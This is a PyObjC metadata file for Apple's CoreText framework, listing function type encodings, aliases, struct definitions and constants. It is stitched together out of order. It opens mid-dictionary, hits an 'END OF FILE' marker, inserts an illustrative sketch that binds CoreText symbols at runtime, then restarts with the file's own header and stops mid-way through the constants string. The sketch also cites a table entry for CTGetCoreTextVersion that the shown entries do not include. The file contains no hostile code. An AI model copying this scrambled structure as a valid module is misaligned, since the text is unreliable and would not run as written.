(sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFontCollectionGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontGetGlyphWithName': (b'S^{__CTFont=}^{__CFString=}',), 'CTLineGetGlyphRuns': (b'^{__CFArray=}^{__CTLine=}',), 'CTFontCreateWithNameAndOptions': (sel32or64(b'^{__CTFont=}^{__CFString=}f^{CGAffineTransform=ffffff}L', b'^{__CTFont=}^{__CFString=}d^{CGAffineTransform=dddddd}Q'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTFontDescriptorCreateCopyWithAttributes': (b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyFontDescriptor': (b'^{__CTFontDescriptor=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetCapHeight': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFontGetUnderlineThickness': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFontManagerCopyAvailableFontURLs': (b'^{__CFArray=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyFeatureSettings': (b'^{__CFArray=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorCreateMatchingFontDescriptor': (b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFSet=}', '', {'retval': {'already_cfretained': True}}), 'CTLineGetGlyphCount': (sel32or64(b'l^{__CTLine=}', b'q^{__CTLine=}'),), 'CTLineDraw': (b'v^{__CTLine=}^{CGContext=}',), 'CTFontDescriptorCreateCopyWithFeature': (b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFNumber=}^{__CFNumber=}', '', {'retval': {'already_cfretained': True}}), 'CTRubyAnnotationGetTypeID': (sel32or64(b'L', b'Q'),), 'CTTypesetterGetTypeID': (sel32or64(b'L', b'Q'),), 'CTRunGetTextMatrix': (sel32or64(b'{CGAffineTransform=ffffff}^{__CTRun=}', b'{CGAffineTransform=dddddd}^{__CTRun=}'),), 'CTFontGetLigatureCaretPositions': (sel32or64(b'l^{__CTFont=}S^fl', b'q^{__CTFont=}S^dq'), '', {'arguments': {2: {'c_array_length_in_arg': 3, 'type_modifier': 'o'}}}), 'CTFontCollectionCreateMutableCopy': (b'^{__CTFontCollection=}^{__CTFontCollection=}', '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorCreateWithNameAndSize': (sel32or64(b'^{__CTFontDescriptor=}^{__CFString=}f', b'^{__CTFontDescriptor=}^{__CFString=}d'), '', {'retval': {'already_cfretained': True}}), 'CTLineGetStringRange': (sel32or64(b'{_CFRange=ll}^{__CTLine=}', b'{_CFRange=qq}^{__CTLine=}'),), 'CTFontManagerCopyAvailablePostScriptNames': (b'^{__CFArray=}', '', {'retval': {'already_cfretained': True}}), 'CTRunDelegateGetRefCon': (b'^v^{__CTRunDelegate=}',), 'CTLineCreateJustifiedLine': (sel32or64(b'^{__CTLine=}^{__CTLine=}fd', b'^{__CTLine=}^{__CTLine=}dd'), '', {'retval': {'already_cfretained': True}}), 'CTFrameGetLines': (b'^{__CFArray=}^{__CTFrame=}',), 'CTFontCollectionCreateCopyWithFontDescriptors': (b'^{__CTFontCollection=}^{__CTFontCollection=}^{__CFArray=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTRunGetGlyphCount': (sel32or64(b'l^{__CTRun=}', b'q^{__CTRun=}'),), 'CTFontDescriptorCreateMatchingFontDescriptors': (b'^{__CFArray=}^{__CTFontDescriptor=}^{__CFSet=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCollectionSetQueryDescriptors': (b'v^{__CTFontCollection=}^{__CFArray=}',), 'CTFontDescriptorCopyLocalizedAttribute': (b'@^{__CTFontDescriptor=}^{__CFString=}^^{__CFString}', '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'o'}}}), 'CTFrameGetStringRange': (sel32or64(b'{_CFRange=ll}^{__CTFrame=}', b'{_CFRange=qq}^{__CTFrame=}'),), 'CTFrameGetLineOrigins': 
(sel32or64(b'v^{__CTFrame=}{_CFRange=ll}^{_NSPoint=ff}', b'v^{__CTFrame=}{_CFRange=qq}^{CGPoint=dd}'), '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTFontCreateWithName': (sel32or64(b'^{__CTFont=}^{__CFString=}f^{CGAffineTransform=ffffff}', b'^{__CTFont=}^{__CFString=}d^{CGAffineTransform=dddddd}'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTFramesetterGetTypesetter': (b'^{__CTTypesetter=}^{__CTFramesetter=}',), 'CTGlyphInfoCreateWithGlyphName': (b'^{__CTGlyphInfo=}^{__CFString=}^{__CTFont=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorCreateCopyWithSymbolicTraits': (b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}II', '', {'retval': {'already_cfretained': True}}), 'CTLineGetBoundsWithOptions': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTLine=}L', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTLine=}Q'),), 'CTFontCopyGraphicsFont': (b'^{CGFont=}^{__CTFont=}^^{__CTFontDescriptor}', '', {'retval': {'already_cfretained': True}, 'arguments': {1: {'already_cfretained': True, 'type_modifier': 'o'}}}), 'CTFontCollectionCreateMatchingFontDescriptorsForFamily': (b'^{__CFArray=}^{__CTFontCollection=}^{__CFString=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetXHeight': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTRunGetPositions': (sel32or64(b'v^{__CTRun=}{_CFRange=ll}^{_NSPoint=ff}', b'v^{__CTRun=}{_CFRange=qq}^{CGPoint=dd}'), '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTFontDescriptorCreateCopyWithVariation': (sel32or64(b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFNumber=}f', b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFNumber=}d'), '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorCreateWithAttributes': (b'^{__CTFontDescriptor=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontCollectionCreateMatchingFontDescriptors': (b'^{__CFArray=}^{__CTFontCollection=}', '', {'retval': {'already_cfretained': True}}), 'CTTextTabGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontManagerUnregisterFontsForURLs': (b'B^{__CFArray=}I^^{__CFArray=}', '', {'arguments': {2: {'type_modifier': 'o'}}}), 'CTFontCreateCopyWithSymbolicTraits': (sel32or64(b'^{__CTFont=}^{__CTFont=}f^{CGAffineTransform=ffffff}II', b'^{__CTFont=}^{__CTFont=}d^{CGAffineTransform=dddddd}II'), '', {'retval': {'already_cfretained': True}}), 'CTFontCopyTraits': (b'^{__CFDictionary=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTRunDraw': (sel32or64(b'v^{__CTRun=}^{CGContext=}{_CFRange=ll}', b'v^{__CTRun=}^{CGContext=}{_CFRange=qq}'),), 'CTLineGetStringIndexForPosition': (sel32or64(b'l^{__CTLine=}{CGPoint=ff}', b'q^{__CTLine=}{CGPoint=dd}'),), 'CTFontDescriptorCopyAttributes': (b'^{__CFDictionary=}^{__CTFontDescriptor=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetLeading': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTRunGetGlyphs': (sel32or64(b'v^{__CTRun=}{_CFRange=ll}^S', b'v^{__CTRun=}{_CFRange=qq}^S'), '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTFontCollectionCreateWithFontDescriptors': (b'^{__CTFontCollection=}^{__CFArray=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTRunDelegateCreate': (sel32or64(b'^{__CTRunDelegate=}^{_CTRunDelegateCallbacks=l^?^?^?^?}^v', b'^{__CTRunDelegate=}^{_CTRunDelegateCallbacks=q^?^?^?^?}^v'), '', {'retval': {'already_cfretained': 
True}}), 'CTTypesetterCreateLineWithOffset': (sel32or64(b'^{__CTLine=}^{__CTTypesetter=}{_CFRange=ll}d', b'^{__CTLine=}^{__CTTypesetter=}{_CFRange=qq}d'), '', {'retval': {'already_cfretained': True}}), 'CTFontGetUnderlinePosition': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTRunGetTypographicBounds': (sel32or64(b'd^{__CTRun=}{_CFRange=ll}^f^f^f', b'd^{__CTRun=}{_CFRange=qq}^d^d^d'), '', {'arguments': {2: {'type_modifier': 'o'}, 3: {'type_modifier': 'o'}, 4: {'type_modifier': 'o'}}}), 'CTTypesetterCreateWithAttributedString': (b'^{__CTTypesetter=}^{__CFAttributedString=}', '', {'retval': {'already_cfretained': True}}), 'CTLineCreateWithAttributedString': (b'^{__CTLine=}^{__CFAttributedString=}', '', {'retval': {'already_cfretained': True}}), 'CTTextTabGetAlignment': (b'C^{__CTTextTab=}',), 'CTFontCopyName': (b'^{__CFString=}^{__CTFont=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetSlantAngle': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFramesetterSuggestFrameSizeWithConstraints': (sel32or64(b'{CGSize=ff}^{__CTTypesetter=}{_CFRange=ll}@{CGSize=ff}^{_CFRange=ll}', b'{CGSize=dd}^{__CTTypesetter=}{_CFRange=qq}@{CGSize=dd}^{_CFRange=qq}'), '', {'arguments': {4: {'type_modifier': 'o'}}}), 'CTFontCollectionCopyFontAttributes': (b'^{__CFArray=}^{__CTFontCollection=}^{__CFSet=}I', '', {'retval': {'already_cfretained': True}}), 'CTFontManagerRegisterFontsForURLs': (b'B^{__CFArray=}I^^{__CFArray=}', '', {'arguments': {2: {'type_modifier': 'o'}}}), 'CTRubyAnnotationGetOverhang': (b'C^{__CTRubyAnnotation=}',), 'CTFontCopyFeatures': (b'^{__CFArray=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCreateForString': (sel32or64(b'^{__CTFont=}^{__CTFont=}^{__CFString=}{_CFRange=ll}', b'^{__CTFont=}^{__CTFont=}^{__CFString=}{_CFRange=qq}'), '', {'retval': {'already_cfretained': True}}), 'CTGlyphInfoGetGlyphName': (b'^{__CFString=}^{__CTGlyphInfo=}',), 'CTParagraphStyleGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontCreateUIFontForLanguage': (sel32or64(b'^{__CTFont=}If^{__CFString=}', b'^{__CTFont=}Id^{__CFString=}'), '', {'retval': {'already_cfretained': True}}), 'CTFontManagerCopyAvailableFontFamilyNames': (b'^{__CFArray=}', '', {'retval': {'already_cfretained': True}}), 'CTFrameGetVisibleStringRange': (sel32or64(b'{_CFRange=ll}^{__CTFrame=}', b'{_CFRange=qq}^{__CTFrame=}'),), 'CTFontManagerRegisterFontsWithAssetNames': (b'v^{__CFArray=}^{__CFBundle=}IB@?', '', {'arguments': {4: {'block': {'retval': {'type': b'B'}, 'arguments': {0: {'type': b'^{__CFArray=}'}, 1: {'type': b'B'}}}}}}), 'CTLineGetTypeID': (sel32or64(b'L', b'Q'),), 'CTRunGetPositionsPtr': (sel32or64(b'r^{_NSPoint=ff}^{__CTRun=}', b'r^{CGPoint=dd}^{__CTRun=}'), '', {'retval': {'c_array_of_variable_length': True}})} aliases = {'kCTFontItalicTrait': 'kCTFontTraitItalic', 'kCTFontMessageFontType': 'kCTFontUIFontMessage', 'kCTNaturalTextAlignment': 'kCTTextAlignmentNatural', 'kCTFontDefaultOrientation': 'kCTFontOrientationDefault', 'kCTFontVerticalTrait': 'kCTFontTraitVertical', 'kFontChineseScript': 'kFontTraditionalChineseScript', 'kCTFontToolbarFontType': 'kCTFontUIFontToolbar', 'kCTFontClarendonSerifsClass': 'kCTFontClassClarendonSerifs', 'kCTFontCondensedTrait': 'kCTFontTraitCondensed', 'kCTIdentityMappingCharacterCollection': 'kCTCharacterCollectionIdentityMapping', 'kFontEthiopicScript': 'kFontGeezScript', 'kCTFontEmphasizedSystemFontType': 'kCTFontUIFontEmphasizedSystem', 'kCTFontSlabSerifsClass': 'kCTFontClassSlabSerifs', 'CT_AVAILABLE_BUT_DEPRECATED': 
'__OSX_AVAILABLE_BUT_DEPRECATED', 'CT_AVAILABLE_STARTING': '__OSX_AVAILABLE_STARTING', 'kCTFontVerticalOrientation': 'kCTFontOrientationVertical', 'kCTFontEmphasizedSystemDetailFontType': 'kCTFontUIFontEmphasizedSystemDetail', 'kCTFontWindowTitleFontType': 'kCTFontUIFontWindowTitle', 'kCTFontOldStyleSerifsClass': 'kCTFontClassOldStyleSerifs', 'kCTFontExpandedTrait': 'kCTFontTraitExpanded', 'kCTAdobeGB1CharacterCollection': 'kCTCharacterCollectionAdobeGB1', 'kCTFontUtilityWindowTitleFontType': 'kCTFontUIFontUtilityWindowTitle', 'kCTFontColorGlyphsTrait': 'kCTFontTraitColorGlyphs', 'kCTFontUserFontType': 'kCTFontUIFontUser', 'kCTFontModernSerifsClass': 'kCTFontClassModernSerifs', 'kCTFontMiniEmphasizedSystemFontType': 'kCTFontUIFontMiniEmphasizedSystem', 'kCTFontApplicationFontType': 'kCTFontUIFontApplication', 'CT_DEPRECATED_ENUMERATOR': '__CT_DEPRECATED_ENUMERATOR', 'kCTFontScriptsClass': 'kCTFontClassScripts', 'kCTFontFreeformSerifsClass': 'kCTFontClassFreeformSerifs', 'kCTFontMiniSystemFontType': 'kCTFontUIFontMiniSystem', 'kCTFontSystemDetailFontType': 'kCTFontUIFontSystemDetail', 'kCTFontManagerScopeUser': 'kCTFontManagerScopePersistent', 'kCTFontMenuItemMarkFontType': 'kCTFontUIFontMenuItemMark', 'kFontSindhiScript': 'kFontExtendedArabicScript', 'kCTRunDelegateCurrentVersion': 'kCTRunDelegateVersion1', 'kCTFontOrnamentalsClass': 'kCTFontClassOrnamentals', 'kCTFontPaletteFontType': 'kCTFontUIFontPalette', 'kCTFontControlContentFontType': 'kCTFontUIFontControlContent', 'kCTFontMenuTitleFontType': 'kCTFontUIFontMenuTitle', 'kFontRussian': 'kFontCyrillicScript', 'kCTFontToolTipFontType': 'kCTFontUIFontToolTip', 'kCTFontTransitionalSerifsClass': 'kCTFontClassTransitionalSerifs', 'kCTFontLabelFontType': 'kCTFontUIFontLabel', 'kCTLeftTextAlignment': 'kCTTextAlignmentLeft', 'kCTAdobeKorea1CharacterCollection': 'kCTCharacterCollectionAdobeKorea1', 'kCTFontNoFontType': 'kCTFontUIFontNone', 'kCTFontUserFixedPitchFontType': 'kCTFontUIFontUserFixedPitch', 'kCTCenterTextAlignment': 'kCTTextAlignmentCenter', 'kCTAdobeJapan2CharacterCollection': 'kCTCharacterCollectionAdobeJapan2', 'kCTFontSmallSystemFontType': 'kCTFontUIFontSmallSystem', 'kCTFontMonoSpaceTrait': 'kCTFontTraitMonoSpace', 'kFontLatvianLanguage': 'kFontLettishLanguage', 'kCTFontSansSerifClass': 'kCTFontClassSansSerif', 'kCTJustifiedTextAlignment': 'kCTTextAlignmentJustified', 'kFontPersianLanguage': 'kFontFarsiLanguage', 'kCTFontAlertHeaderFontType': 'kCTFontUIFontAlertHeader', 'kCTFontBoldTrait': 'kCTFontTraitBold', 'kFontLappishLanguage': 'kFontSaamiskLanguage', 'kCTFontSmallEmphasizedSystemFontType': 'kCTFontUIFontSmallEmphasizedSystem', 'kCTFontSymbolicClass': 'kCTFontClassSymbolic', 'kCTFontMenuItemCmdKeyFontType': 'kCTFontUIFontMenuItemCmdKey', 'kCTAdobeCNS1CharacterCollection': 'kCTCharacterCollectionAdobeCNS1', 'kCTFontCompositeTrait': 'kCTFontTraitComposite', 'kCTFontUnknownClass': 'kCTFontClassUnknown', 'kCTFontUIOptimizedTrait': 'kCTFontTraitUIOptimized', 'kCTFontClassMaskTrait': 'kCTFontTraitClassMask', 'kCTFontMenuItemFontType': 'kCTFontUIFontMenuItem', 'kCTAdobeJapan1CharacterCollection': 'kCTCharacterCollectionAdobeJapan1', 'kCTFontPushButtonFontType': 'kCTFontUIFontPushButton', 'kCTFontSystemFontType': 'kCTFontUIFontSystem', 'kFontEastEuropeanRomanScript': 'kFontSlavicScript', 'kCTFontSmallToolbarFontType': 'kCTFontUIFontSmallToolbar', 'kCTFontHorizontalOrientation': 'kCTFontOrientationHorizontal', 'kFontOromoLanguage': 'kFontGallaLanguage', 'kCTRightTextAlignment': 'kCTTextAlignmentRight', 'kFontAmharicScript': 
'kFontGeezScript', 'kCTFontViewsFontType': 'kCTFontUIFontViews'}
cftypes = [
    ('CTFontCollectionRef', b'^{__CTFontCollection=}', 'CTFontCollectionGetTypeID', 'NSCTFontCollection'),
    ('CTFontDescriptorRef', b'^{__CTFontDescriptor=}', 'CTFontDescriptorGetTypeID', 'NSCTFontDescriptor'),
    ('CTFontRef', b'^{__CTFont=}', 'CTFontGetTypeID', 'NSCTFont'),
    ('CTFrameRef', b'^{__CTFrame=}', 'CTFrameGetTypeID', None),
    ('CTFramesetterRef', b'^{__CTFramesetter=}', 'CTFramesetterGetTypeID', None),
    ('CTGlyphInfoRef', b'^{__CTGlyphInfo=}', 'CTGlyphInfoGetTypeID', 'NSCTGlyphInfo'),
    ('CTLineRef', b'^{__CTLine=}', 'CTLineGetTypeID', None),
    ('CTParagraphStyleRef', b'^{__CTParagraphStyle=}', 'CTParagraphStyleGetTypeID', None),
    ('CTRubyAnnotationRef', b'^{__CTRubyAnnotation=}', None, None),
    ('CTRunDelegateRef', b'^{__CTRunDelegate=}', 'CTRunDelegateGetTypeID', None),
    ('CTRunRef', b'^{__CTRun=}', 'CTRunGetTypeID', None),
    ('CTTextTabRef', b'^{__CTTextTab=}', 'CTTextTabGetTypeID', None),
    ('CTTypesetterRef', b'^{__CTTypesetter=}', 'CTTypesetterGetTypeID', None),
]
expressions = {}
# END OF FILE
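# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the generated metadata above). The
# `functions`, `constants`, `enums`, `aliases` and `cftypes` tables in this
# file are normally consumed by PyObjC's framework loader; as a hypothetical
# example, individual symbols can also be bound at runtime with the public
# objc loader helpers. The bundle identifier and the symbols chosen below are
# assumptions picked for demonstration only.
if __name__ == "__main__":
    import objc
    from Foundation import NSBundle  # requires the pyobjc Cocoa bindings

    coretext_bundle = NSBundle.bundleWithIdentifier_("com.apple.CoreText")
    namespace = {}

    # Bind a plain C function from its (name, type-encoding) pair; the
    # encoding b'I' (returns an unsigned int, takes no arguments) matches the
    # entry for CTGetCoreTextVersion in the `functions` table above.
    objc.loadBundleFunctions(
        coretext_bundle,
        namespace,
        [("CTGetCoreTextVersion", b"I")],
    )

    # Bind an exported constant, loading the CFStringRef as a generic object.
    objc.loadBundleVariables(
        coretext_bundle,
        namespace,
        [("kCTFontAttributeName", b"@")],
    )

    print("CoreText version:", namespace["CTGetCoreTextVersion"]())
    print("kCTFontAttributeName:", namespace["kCTFontAttributeName"])
# ---------------------------------------------------------------------------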
# This file is generated by objective.metadata
#
# Last update: Sun Sep 29 13:08:51 2019

import objc, sys

if sys.maxsize > 2 ** 32:

    def sel32or64(a, b):
        return b


else:

    def sel32or64(a, b):
        return a


misc = {}
misc.update({
    'sfntInstance': objc.createStructType('sfntInstance', sel32or64(b'{sfntInstance=ss[1l]}', b'{sfntInstance=ss[1i]}'), ['nameID', 'flags', 'coord']),
    'sfntFontDescriptor': objc.createStructType('sfntFontDescriptor', sel32or64(b'{sfntFontDescriptor=Ll}', b'{sfntFontDescriptor=Ii}'), ['name', 'value']),
    'sfntCMapExtendedSubHeader': objc.createStructType('sfntCMapExtendedSubHeader', sel32or64(b'{sfntCMapExtendedSubHeader=SSLL}', b'{sfntCMapExtendedSubHeader=SSII}'), ['format', 'reserved', 'length', 'language']),
    'sfntVariationAxis': objc.createStructType('sfntVariationAxis', sel32or64(b'{sfntVariationAxis=Llllss}', b'{sfntVariationAxis=Iiiiss}'), ['axisTag', 'minValue', 'defaultValue', 'maxValue', 'flags', 'nameID']),
    'CTParagraphStyleSetting': objc.createStructType('CTParagraphStyleSetting', sel32or64(b'{CTParagraphStyleSetting=IL^v}', b'{CTParagraphStyleSetting=IQ^v}'), ['spec', 'valueSize', 'value']),
    'sfntVariationHeader': objc.createStructType('sfntVariationHeader', sel32or64(b'{sfntVariationHeader=lSSSSSS[1{sfntVariationAxis=Llllss}][1{sfntInstance=ss[1l]}]}', b'{sfntVariationHeader=iSSSSSS[1{sfntVariationAxis=Iiiiss}][1{sfntInstance=ss[1i]}]}'), ['version', 'offsetToData', 'countSizePairs', 'axisCount', 'axisSize', 'instanceCount', 'instanceSize', 'axis', 'instance']),
    'sfntDescriptorHeader': objc.createStructType('sfntDescriptorHeader', sel32or64(b'{sfntDescriptorHeader=ll[1{sfntFontDescriptor=Ll}]}', b'{sfntDescriptorHeader=ii[1{sfntFontDescriptor=Ii}]}'), ['version', 'descriptorCount', 'descriptor']),
    'sfntDirectory': objc.createStructType('sfntDirectory', sel32or64(b'{sfntDirectory=LSSSS[1{sfntDirectoryEntry=LLLL}]}', b'{sfntDirectory=ISSSS[1{sfntDirectoryEntry=IIII}]}'), ['format', 'numOffsets', 'searchRange', 'entrySelector', 'rangeShift', 'table']),
    'sfntFeatureName': objc.createStructType('sfntFeatureName', sel32or64(b'{sfntFeatureName=SSlSs}', b'{sfntFeatureName=SSiSs}'), ['featureType', 'settingCount', 'offsetToSettings', 'featureFlags', 'nameID']),
    'sfntDirectoryEntry': objc.createStructType('sfntDirectoryEntry', sel32or64(b'{sfntDirectoryEntry=LLLL}', b'{sfntDirectoryEntry=IIII}'), ['tableTag', 'checkSum', 'offset', 'length']),
    'sfntCMapEncoding': objc.createStructType('sfntCMapEncoding', sel32or64(b'{sfntCMapEncoding=SSL}', b'{sfntCMapEncoding=SSI}'), ['platformID', 'scriptID', 'offset']),
    'sfntFontFeatureSetting': objc.createStructType('sfntFontFeatureSetting', b'{sfntFontFeatureSetting=Ss}', ['setting', 'nameID']),
    'sfntFontRunFeature': objc.createStructType('sfntFontRunFeature', b'{sfntFontRunFeature=SS}', ['featureType', 'setting']),
    'sfntCMapSubHeader': objc.createStructType('sfntCMapSubHeader', b'{sfntCMapSubHeader=SSS}', ['format', 'length', 'languageID']),
    'sfntNameHeader': objc.createStructType('sfntNameHeader', b'{sfntNameHeader=SSS[1{sfntNameRecord=SSSSSS}]}', ['format', 'count', 'stringOffset', 'rec']),
    'sfntCMapHeader': objc.createStructType('sfntCMapHeader', sel32or64(b'{sfntCMapHeader=SS[1{sfntCMapEncoding=SSL}]}', b'{sfntCMapHeader=SS[1{sfntCMapEncoding=SSI}]}'), ['version', 'numTables', 'encoding']),
    'FontVariation': objc.createStructType('FontVariation', sel32or64(b'{FontVariation=Ll}', b'{FontVariation=Ii}'), ['name', 'value']),
    'sfntFeatureHeader': objc.createStructType('sfntFeatureHeader',
sel32or64(b'{sfntFeatureHeader=lSSl[1{sfntFeatureName=SSlSs}][1{sfntFontFeatureSetting=Ss}][1{sfntFontRunFeature=SS}]}', b'{sfntFeatureHeader=iSSi[1{sfntFeatureName=SSiSs}][1{sfntFontFeatureSetting=Ss}][1{sfntFontRunFeature=SS}]}'), ['version', 'featureNameCount', 'featureSetCount', 'reserved', 'names', 'settings', 'runs']), 'sfntNameRecord': objc.createStructType('sfntNameRecord', b'{sfntNameRecord=SSSSSS}', ['platformID', 'scriptID', 'languageID', 'nameID', 'length', 'offset'])}) constants = '''$kCTBackgroundColorAttributeName@^{__CFString=}$kCTBaselineClassAttributeName@^{__CFString=}$kCTBaselineClassHanging@^{__CFString=}$kCTBaselineClassIdeographicCentered@^{__CFString=}$kCTBaselineClassIdeographicHigh@^{__CFString=}$kCTBaselineClassIdeographicLow@^{__CFString=}$kCTBaselineClassMath@^{__CFString=}$kCTBaselineClassRoman@^{__CFString=}$kCTBaselineInfoAttributeName@^{__CFString=}$kCTBaselineOffsetAttributeName@^{__CFString=}$kCTBaselineOriginalFont@^{__CFString=}$kCTBaselineReferenceFont@^{__CFString=}$kCTBaselineReferenceInfoAttributeName@^{__CFString=}$kCTCharacterShapeAttributeName@^{__CFString=}$kCTFontAttributeName@^{__CFString=}$kCTFontBaselineAdjustAttribute@^{__CFString=}$kCTFontCascadeListAttribute@^{__CFString=}$kCTFontCharacterSetAttribute@^{__CFString=}$kCTFontCollectionDisallowAutoActivationOption@^{__CFString=}$kCTFontCollectionIncludeDisabledFontsOption@^{__CFString=}$kCTFontCollectionRemoveDuplicatesOption@^{__CFString=}$kCTFontCopyrightNameKey@^{__CFString=}$kCTFontDescriptionNameKey@^{__CFString=}$kCTFontDescriptorMatchingCurrentAssetSize@^{__CFString=}$kCTFontDescriptorMatchingDescriptors@^{__CFString=}$kCTFontDescriptorMatchingError@^{__CFString=}$kCTFontDescriptorMatchingPercentage@^{__CFString=}$kCTFontDescriptorMatchingResult@^{__CFString=}$kCTFontDescriptorMatchingSourceDescriptor@^{__CFString=}$kCTFontDescriptorMatchingTotalAssetSize@^{__CFString=}$kCTFontDescriptorMatchingTotalDownloadedSize@^{__CFString=}$kCTFontDesignerNameKey@^{__CFString=}$kCTFontDesignerURLNameKey@^{__CFString=}$kCTFontDisplayNameAttribute@^{__CFString=}$kCTFontDownloadableAttribute@^{__CFString=}$kCTFontDownloadedAttribute@^{__CFString=}$kCTFontEnabledAttribute@^{__CFString=}$kCTFontFamilyNameAttribute@^{__CFString=}$kCTFontFamilyNameKey@^{__CFString=}$kCTFontFeatureSampleTextKey@^{__CFString=}$kCTFontFeatureSelectorDefaultKey@^{__CFString=}$kCTFontFeatureSelectorIdentifierKey@^{__CFString=}$kCTFontFeatureSelectorNameKey@^{__CFString=}$kCTFontFeatureSelectorSettingKey@^{__CFString=}$kCTFontFeatureSettingsAttribute@^{__CFString=}$kCTFontFeatureTooltipTextKey@^{__CFString=}$kCTFontFeatureTypeExclusiveKey@^{__CFString=}$kCTFontFeatureTypeIdentifierKey@^{__CFString=}$kCTFontFeatureTypeNameKey@^{__CFString=}$kCTFontFeatureTypeSelectorsKey@^{__CFString=}$kCTFontFeaturesAttribute@^{__CFString=}$kCTFontFixedAdvanceAttribute@^{__CFString=}$kCTFontFormatAttribute@^{__CFString=}$kCTFontFullNameKey@^{__CFString=}$kCTFontLanguagesAttribute@^{__CFString=}$kCTFontLicenseNameKey@^{__CFString=}$kCTFontLicenseURLNameKey@^{__CFString=}$kCTFontMacintoshEncodingsAttribute@^{__CFString=}$kCTFontManagerBundleIdentifier@^{__CFString=}$kCTFontManagerErrorDomain@^{__CFString=}$kCTFontManagerErrorFontAssetNameKey@^{__CFString=}$kCTFontManagerErrorFontDescriptorsKey@^{__CFString=}$kCTFontManagerErrorFontURLsKey@^{__CFString=}$kCTFontManagerRegisteredFontsChangedNotification@^{__CFString=}$kCTFontManufacturerNameKey@^{__CFString=}$kCTFontMatrixAttribute@^{__CFString=}$kCTFontNameAttribute@^{__CFString=}$kCTFontOpenType
FeatureTag@^{__CFString=}$kCTFontOpenTypeFeatureValue@^{__CFString=}$kCTFontOrientationAttribute@^{__CFString=}$kCTFontPostScriptCIDNameKey@^{__CFString=}$kCTFontPostScriptNameKey@^{__CFString=}$kCTFontPriorityAttribute@^{__CFString=}$kCTFontRegistrationScopeAttribute@^{__CFString=}$kCTFontRegistrationUserInfoAttribute@^{__CFString=}$kCTFontSampleTextNameKey@^{__CFString=}$kCTFontSizeAttribute@^{__CFString=}$kCTFontSlantTrait@^{__CFString=}$kCTFontStyleNameAttribute@^{__CFString=}$kCTFontStyleNameKey@^{__CFString=}$kCTFontSubFamilyNameKey@^{__CFString=}$kCTFontSymbolicTrait@^{__CFString=}$kCTFontTrademarkNameKey@^{__CFString=}$kCTFontTraitsAttribute@^{__CFString=}$kCTFontURLAttribute@^{__CFString=}$kCTFontUniqueNameKey@^{__CFString=}$kCTFontVariationAttribute@^{__CFString=}$kCTFontVariationAxisDefaultValueKey@^{__CFString=}$kCTFontVariationAxisHiddenKey@^{__CFString=}$kCTFontVariationAxisIdentifierKey@^{__CFString=}$kCTFontVariationAxisMaximumValueKey@^{__CFString=}$kCTFontVariationAxisMinimumValueKey@^{__CFString=}$kCTFontVariationAxisNameKey@^{__CFString=}$kCTFontVendorURLNameKey@^{__CFString=}$kCTFontVersionNameKey@^{__CFString=}$kCTFontWeightTrait@^{__CFString=}$kCTFontWidthTrait@^{__CFString=}$kCTForegroundColorAttributeName@^{__CFString=}$kCTForegroundColorFromContextAttributeName@^{__CFString=}$kCTFrameClippingPathsAttributeName@^{__CFString=}$kCTFramePathClippingPathAttributeName@^{__CFString=}$kCTFramePathFillRuleAttributeName@^{__CFString=}$kCTFramePathWidthAttributeName@^{__CFString=}$kCTFrameProgressionAttributeName@^{__CFString=}$kCTGlyphInfoAttributeName@^{__CFString=}$kCTHorizontalInVerticalFormsAttributeName@^{__CFString=}$kCTKernAttributeName@^{__CFString=}$kCTLanguageAttributeName@^{__CFString=}$kCTLigatureAttributeName@^{__CFString=}$kCTParagraphStyleAttributeName@^{__CFString=}$kCTRubyAnnotationAttributeName@^{__CFString=}$kCTRubyAnnotationScaleToFitAttributeName@^{__CFString=}$kCTRubyAnnotationSizeFactorAttributeName@^{__CFString=}$kCTRunDelegateAttributeName@^{__CFString=}$kCTStrokeColorAttributeName@^{__CFString=}$kCT